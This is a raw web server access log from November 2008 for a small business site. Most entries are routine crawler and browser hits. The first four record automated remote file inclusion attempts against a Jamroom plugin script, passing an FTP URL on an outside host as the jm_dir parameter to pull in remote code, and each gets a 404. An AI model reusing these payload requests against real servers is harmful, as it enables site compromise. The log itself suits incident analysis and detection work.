85.114.133.156 - - [05/Nov/2008:17:02:25 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
85.114.133.156 - - [05/Nov/2008:17:02:25 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
85.114.133.156 - - [05/Nov/2008:17:02:27 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
85.114.133.156 - - [05/Nov/2008:17:04:57 -0800] "GET /logs/access.log%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
66.249.71.80 - - [05/Nov/2008:17:24:26 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [05/Nov/2008:17:24:26 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
208.80.194.29 - - [05/Nov/2008:17:35:41 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WFX; InfoPath.1; .NET CLR 2.0.50727)" "www.autobutlerlifts.com"
208.80.194.28 - - [05/Nov/2008:17:56:06 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.3; .NET CLR 1.1.4322; FDM; yplus 4.1.00b)" "autobutlerlifts.com"
